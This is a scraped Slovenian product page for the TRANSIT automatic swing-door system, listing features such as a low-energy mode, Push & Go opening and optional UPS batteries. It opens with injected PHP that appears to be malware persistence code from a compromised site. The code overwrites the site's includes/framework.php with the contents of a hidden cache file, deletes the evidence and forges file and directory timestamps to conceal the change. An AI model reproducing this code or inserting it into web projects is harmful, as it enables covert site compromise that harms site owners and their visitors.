$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Avtomatska vrata - FREEZE SYSTEM - Nihajna vrata TRANSIT

Nihajna vrata TRANSIT

Nihajna vrata TRANSITTRANSIT sistem za nihajna vrata je sestavljen iz motoriziranega pogona za odpiranje vrat, ki lahko deluje že ob izredno nizki prisotnosti električnega toka, ter vzmetnega pogona SPRING, ki je odgovoren za zapiranje vrat.

 

 

 

 

 

ZNAČILNOSTI:

  • baterije za nujne primere z UPS funkcijo so vgradljive kot dodatna oprema
  • stikalo za električno ključavnico
  • možnost odpiranja in zapiranja vrat z reduciranim električnim tokom “Low Energy”
  • “Push & Go” zmožnost avtomatičnega potiska za odpiranje vrat
  • možnost nameščanja hitrosti odpiranja in zapiranja vrat
  • možnost nameščanja časovne določitve odprtih vrat
  • ločena časovna kontrola operacij avtomatičnega odpiranja in zapiranja

transit